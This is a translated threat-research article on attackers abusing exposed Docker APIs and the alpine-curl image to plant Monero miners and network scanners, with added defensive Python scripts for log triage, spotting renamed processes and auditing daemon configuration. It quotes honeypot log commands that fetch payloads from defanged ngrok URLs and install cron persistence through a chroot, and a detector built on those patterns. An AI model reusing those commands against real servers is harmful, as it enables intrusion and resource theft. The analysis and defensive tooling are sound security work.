How unprotected Docker APIs and public community images are used to distribute cryptocurrency miners


We analysed data collected with honeypot containers that we set up to detect threats. We found significant activity from unwanted or unauthorised cryptocurrency miners deployed as rogue containers using an image published on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.

In addition, networking tools are installed to break into neighbouring exposed containers and applications.

We leave the honeypots as they are, that is, with default settings, without any security measures and without installing additional software. Note that Docker publishes recommendations for the initial setup to avoid mistakes and simple vulnerabilities. But the honeypots used here are containers designed to detect attacks aimed at the platform, not at the applications inside the container.

The detected malicious activity is also notable because it requires no vulnerability and is independent of the Docker version. Finding a misconfigured, and therefore open, container image is all the attackers need to infect a large number of exposed servers.

An unprotected Docker API lets a user perform a wide range of operations, including listing running containers, fetching logs from a specific container, starting and stopping containers (including forcibly), and even creating a new container from a specified image with specified settings.

Figure: On the left is the malware delivery path. On the right is the attacker's environment, which allows images to be pulled remotely.

Figure: Distribution by country of 3762 open Docker APIs, based on a Shodan search on 12.02.2019.

Attack chain and payload options

The malicious activity was not discovered only with the help of honeypots. Shodan data shows that the number of exposed Docker APIs (see the second figure) has grown since we examined a misconfigured container that was used as a bridge to deploy Monero cryptocurrency-mining software. In October of last year (2018; current figures can be obtained roughly the same way, translator's note) there were only 856 open APIs.

Examination of the honeypot logs showed that the use of the container image is also linked to the use of ngrok, a tool for establishing secure connections or forwarding traffic from publicly reachable endpoints to specific addresses or resources (for example, localhost). This lets the attackers generate URLs dynamically when delivering the payload to open servers. Below are sample lines from the logs showing abuse of the ngrok service:

Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the payload files are downloaded from constantly changing URLs. These URLs have a short lifetime, so the payload can no longer be downloaded once they expire.
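The log entries above share a recognisable shape: a shell entrypoint whose command downloads from a short-lived ngrok tunnel, writes cron entries under a mounted copy of the host filesystem, and then starts a cron daemon inside that chroot. The following triage script, an added example and not code from the original article, applies a small set of rules to container-create records of that shape. The sample records are constructed (the hashes from the logs are replaced with the placeholder EXAMPLE), and the rule names and the "two or more hits" threshold are this example's own choices.

```python
"""Triage Docker container-create records for the dropper pattern seen in the
honeypot logs: a curl download from a throwaway ngrok tunnel, cron entries
written under a chroot, and a cron daemon started inside that chroot.
Added example; the sample records below are constructed with placeholder hashes."""
import re
from typing import Dict, List

# Constructed records in the shape of the honeypot entries (Entrypoint + Command/Cmd).
SAMPLE_CREATES: List[Dict[str, str]] = [
    {   # the dropper pattern from the logs, hashes replaced by EXAMPLE
        "Entrypoint": "/bin/sh",
        "Command": ('-c curl --retry 3 -m 60 -o /tmpEXAMPLE/tmp/tmpfileEXAMPLE '
                    '"hxxp://EXAMPLE[.]ngrok[.]io/f/serve?l=d&r=EXAMPLE";'
                    'echo "* * * * * root sh /tmp/tmpfileEXAMPLE" >/tmpEXAMPLE/etc/crontab;'
                    'echo "* * * * * root sh /tmp/tmpfileEXAMPLE" >/tmpEXAMPLE/etc/cron.d/1m;'
                    'chroot /tmpEXAMPLE sh -c "cron || crond"'),
    },
    {"Entrypoint": "nginx", "Cmd": "-g daemon off;"},        # benign web server start
    {"Entrypoint": "/bin/sh", "Cmd": "-c /app/start.sh"},    # benign shell wrapper
]

# Each rule is a name plus a regex applied to the string "<entrypoint> <command>".
RULES: Dict[str, "re.Pattern[str]"] = {
    # a downloader in the same ';'-separated segment as an ngrok hostname (defanged or not)
    "download_from_ngrok_tunnel": re.compile(r"\b(curl|wget)\b[^;]*ngrok\[?\.\]?io", re.I),
    # redirect into <some prefix>/etc/crontab or <prefix>/etc/cron.d/, i.e. the host's cron via a mount
    "cron_persistence_under_chroot": re.compile(r">\s*/\S+/etc/(crontab|cron\.d/)", re.I),
    # 'chroot <dir> sh -c "cron' or '... crond': starting the host's cron from inside the mount
    "cron_started_inside_chroot": re.compile(r"\bchroot\s+\S+\s+sh\s+-c\s+\"?\s*crond?\b", re.I),
    # a /bin/sh entrypoint whose first action is a download
    "shell_runs_inline_download": re.compile(r"^/bin/sh\s+-c\s+(curl|wget)\b", re.I),
}


def score_create(record: Dict[str, str]) -> Dict[str, object]:
    """Return the matched rule names; two or more independent hits is treated as suspicious."""
    command = record.get("Command") or record.get("Cmd", "")
    cmdline = f'{record.get("Entrypoint", "")} {command}'
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    return {"hits": hits, "suspicious": len(hits) >= 2}


def triage(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Score every record; callers feed this from their API audit log or docker events."""
    return [score_create(r) for r in records]


if __name__ == "__main__":
    for rec, res in zip(SAMPLE_CREATES, triage(SAMPLE_CREATES)):
        print(res["suspicious"], res["hits"], rec["Entrypoint"])
```

The rules deliberately look for the combination of behaviours rather than the ngrok hostname alone: the hostnames rotate with every delivery, as the log excerpts show, while the cron-under-chroot persistence step is what actually needs the container to be created with host paths mounted, and that is the part worth alerting on.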

There are two payload options. The first is an ELF miner compiled for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools that are used to scan network ranges and then find new targets.

The dropper script sets two variables that are used to deploy the cryptocurrency miner. The HOST variable contains the URL where the malicious files are located, and the RIP variable is the file name (in fact, a hash) of the miner to be deployed. The HOST variable changes every time the hash variable changes. The script also tries to check that no other cryptocurrency miners are running on the attacked server.

Figure: Examples of HOST and RIP, and the code snippet used to check that no other miners are running.

Before the miner is started, it is renamed to nginx. Other versions of this script rename the miner to other legitimate services that might be present in a Linux environment. This is usually enough to bypass a check against the list of running processes.
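A process-list check that only compares names is exactly what the rename defeats. The check below, an added example and not code from the original article, compares the name a process shows (/proc/<pid>/comm, which is trivially chosen by whoever started it) with the executable actually mapped behind /proc/<pid>/exe, its location, and whether that file was unlinked after start. The SAMPLE_PROCS records and the KNOWN_GOOD table are constructed; collect_live() is only useful on a Linux host with /proc.

```python
"""Spot a process hiding behind a legitimate-looking name, such as a miner
renamed to "nginx". The name is cheap to change; the executable behind
/proc/<pid>/exe, the directory it runs from and an unlinked file are not.
Added example; SAMPLE_PROCS and KNOWN_GOOD are constructed."""
import os
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Proc:
    pid: int
    comm: str   # name shown by ps (/proc/<pid>/comm), at most 15 characters on Linux
    exe: str    # resolved /proc/<pid>/exe target, i.e. the binary actually executing


# Constructed allow-list: where each service binary is expected to live on this host.
KNOWN_GOOD: Dict[str, str] = {
    "nginx": "/usr/sbin/nginx",
    "sshd": "/usr/sbin/sshd",
}

# Constructed sample: one real nginx and two renamed miners.
SAMPLE_PROCS: List[Proc] = [
    Proc(412, "nginx", "/usr/sbin/nginx"),
    Proc(7731, "nginx", "/tmp/.x/nginx"),             # miner copied to /tmp and named nginx
    Proc(7740, "nginx", "/tmp/.x/miner (deleted)"),   # renamed via argv[0], file then unlinked
]

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DELETED_SUFFIX = " (deleted)"   # how the kernel marks an unlinked exe target


def classify(p: Proc) -> List[str]:
    """Return the reasons this process looks spoofed (empty list = nothing found)."""
    findings: List[str] = []
    deleted = p.exe.endswith(DELETED_SUFFIX)
    exe_path = p.exe[: -len(DELETED_SUFFIX)] if deleted else p.exe
    base = os.path.basename(exe_path)
    # comm is truncated to 15 chars by the kernel, so compare against the truncated basename
    if base[:15] != p.comm:
        findings.append(f"name '{p.comm}' does not match executable '{base}'")
    expected = KNOWN_GOOD.get(p.comm)
    if expected and exe_path != expected:
        findings.append(f"'{p.comm}' runs from {exe_path}, expected {expected}")
    if exe_path.startswith(TEMP_DIRS):
        findings.append(f"executable lives in a world-writable directory: {exe_path}")
    if deleted:
        findings.append("executable was unlinked after start")
    return findings


def audit(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map pid -> findings for every process with at least one finding."""
    return {p.pid: f for p in procs if (f := classify(p))}


def collect_live() -> List[Proc]:
    """Build Proc records from /proc. Entries that cannot be read (other users'
    processes without root) are skipped, so run as root for a full picture."""
    procs: List[Proc] = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as fh:
                comm = fh.read().strip()
            exe = os.readlink(f"/proc/{entry}/exe")
        except OSError:
            continue
        procs.append(Proc(int(entry), comm, exe))
    return procs


if __name__ == "__main__":
    for pid, reasons in audit(SAMPLE_PROCS).items():
        print(pid, reasons)
```

Inside a container the same check applies, but the expected paths in KNOWN_GOOD come from the image rather than the host; a miner that was renamed but is still writing to a pool over the network will also show up in per-process socket listings, which is a useful second signal when the binary path looks plausible.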

The scanning script has its own features as well. It uses the same URL service to deploy the tools it needs. Among them is the zmap binary, which is used to scan networks and obtain a list of open ports. The script also fetches another binary that is used to interact with the discovered services and grab their banners in order to determine additional information about the discovered service (for example, its version).

The script also predefines some network ranges to scan, but this depends on the script version. It also sets the target ports of the services, in this case Docker, before running the scan.

Once targets are found, their banners are grabbed automatically. The script also filters targets by services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 client and Apache CouchDB. If a scanned server matches one of them, it is saved in a text file that the attackers can later use for analysis and compromise. These text files are uploaded to the attackers' server via dynamic links. That is, a separate URL is used for each file, which makes later access difficult.

The attack vector is a Docker image, as can be seen in the following two figures.

Figure: At the top, the rename to a legitimate service; at the bottom, how zmap is used to scan networks.

Figure: At the top, the predefined network ranges; at the bottom, the specific ports used to look for services, including Docker.

Figure: The screenshot shows that the alpine-curl image has been downloaded more than 10 million times.

From Alpine Linux and curl, an efficient CLI tool for transferring files over various protocols, you can build a Docker image. As you can see in the previous figure, this image has already been downloaded more than 10 million times. The large number of downloads may indicate that this image is used as an entry point: the image was last updated more than six months ago, and users have not downloaded other images from this repository nearly as often. In Docker, the entrypoint is the set of instructions used to configure a container so that it runs. If the entrypoint settings are wrong (for example, the container is left open to the Internet), the image can be used as an attack vector. Attackers can use it to deliver a payload if they find a misconfigured or open container that has been left behind without support.

It is important to note that this image (alpine-curl) itself is not malicious, but as shown above it can be used to carry out malicious functions. Similar Docker images can also be used to perform malicious actions. We contacted Docker and worked with them on this issue.

Recommendations

Misconfiguration remains a constant problem for many companies, especially those adopting DevOps with its focus on fast development and delivery. This is made worse by the need to comply with audit and monitoring requirements, the need to watch over data confidentiality, and the large damage caused by failing to do so. Integrating automated security into the development lifecycle not only helps you find security holes that might otherwise go undetected, but also helps you cut unnecessary work, such as producing an additional software build for every vulnerability or misconfiguration found after the application has been deployed.

The incident discussed in this article shows the need to consider security from the very beginning, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
  • Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service) and add encryption to network connections.
  • Follow the recommendations and enable the security mechanisms, e.g. those from Docker and the built-in security features.
  • Use automated scanning of runtimes and images to get additional information about the processes running in a container (for example, to detect spoofing or look for vulnerabilities). Application control and integrity monitoring help track abnormal changes to servers, files and system areas.
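The first recommendation, accepting API requests only from specific servers or the internal network, comes down to two daemon settings: where dockerd listens and whether it demands a client certificate. The audit script below, an added example and not code from the original article or from Docker, reads those settings from the two places they are usually configured, the "hosts" and "tlsverify" keys of daemon.json and the -H/--host flags on a systemd ExecStart line, and rates each TCP listener. The weak and hardened configurations are constructed samples, and the severity labels are this example's own.

```python
"""Audit where the Docker daemon listens and whether client certificates are
required. Reads the "hosts"/"tlsverify" keys of daemon.json and the -H/--host
and --tlsverify flags of a dockerd ExecStart line. Added example; the sample
configurations are constructed and the severity scale is this example's own."""
import json
import shlex
from typing import Dict, List, Tuple

# Constructed weak setting: API reachable on every interface, no TLS at all.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed corrected setting: one internal address, client certificate required.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed systemd drop-in line, the other common way the TCP listener gets enabled.
WEAK_EXECSTART = "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"

WILDCARDS = {"", "0.0.0.0", "::", "[::]"}   # bind addresses that mean "all interfaces"


def audit_listeners(hosts: List[str], tlsverify: bool) -> List[Dict[str, str]]:
    """Rate each tcp:// listener; unix:// and fd:// sockets are local and skipped."""
    findings: List[Dict[str, str]] = []
    for h in hosts:
        if not h.startswith("tcp://"):
            continue
        bind = h[len("tcp://"):].rsplit(":", 1)[0]     # drop the port, keep the address
        wildcard = bind in WILDCARDS
        if not tlsverify:
            findings.append({"host": h, "severity": "critical" if wildcard else "high",
                             "reason": "TCP API without client-certificate verification"})
        elif wildcard:
            findings.append({"host": h, "severity": "medium",
                             "reason": "TLS-verified API on all interfaces; bind to an "
                                       "internal address or restrict it with a firewall"})
    return findings


def audit_daemon_json(text: str) -> List[Dict[str, str]]:
    """Audit the contents of /etc/docker/daemon.json."""
    cfg = json.loads(text)
    return audit_listeners(cfg.get("hosts", []), bool(cfg.get("tlsverify", False)))


def parse_execstart(line: str) -> Tuple[List[str], bool]:
    """Extract -H/--host values and whether --tlsverify is set from an ExecStart= line."""
    args = shlex.split(line.split("=", 1)[1])
    hosts: List[str] = []
    tlsverify = False
    i = 0
    while i < len(args):
        a = args[i]
        if a in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 1
        elif a.startswith("--host="):
            hosts.append(a.split("=", 1)[1])
        elif a in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return hosts, tlsverify


def audit_execstart(line: str) -> List[Dict[str, str]]:
    """Audit the dockerd ExecStart line of a systemd unit or drop-in."""
    hosts, tlsverify = parse_execstart(line)
    return audit_listeners(hosts, tlsverify)


if __name__ == "__main__":
    print("weak daemon.json:", audit_daemon_json(WEAK_DAEMON_JSON))
    print("hardened daemon.json:", audit_daemon_json(HARDENED_DAEMON_JSON))
    print("weak ExecStart:", audit_execstart(WEAK_EXECSTART))
```

Running it against the real files on a host means reading /etc/docker/daemon.json and the ExecStart line of the docker.service unit (including any drop-ins under /etc/systemd/system/docker.service.d/). A clean result from this audit is necessary but not sufficient: the hardened sample still relies on the private key staying private and on the CA only issuing client certificates to the hosts that should reach the API.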

Trend Micro helps DevOps teams build securely, release quickly and deploy anywhere. Trend Micro Hybrid Cloud Security provides powerful, streamlined and automated security across the organization's DevOps pipeline and delivers XGen multi-layered threat defense to protect physical, virtual and cloud workloads at runtime. It also adds container security with Deep Security and Deep Security Smart Check, which scan Docker container images for malware and vulnerabilities at any point in the development pipeline to stop threats before they are deployed.

Indicators of compromise

Related hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

In the Docker video course, the instructors show which settings need to be made first to reduce the likelihood of, or completely avoid, the situation described above. And on August 19-21, at the online intensive DevOps Tools & Cheats, you can discuss these and similar security problems with colleagues and practising instructors at a round table, where everyone can speak and hear about the pains and successes of their peers.

source: www.habr.com
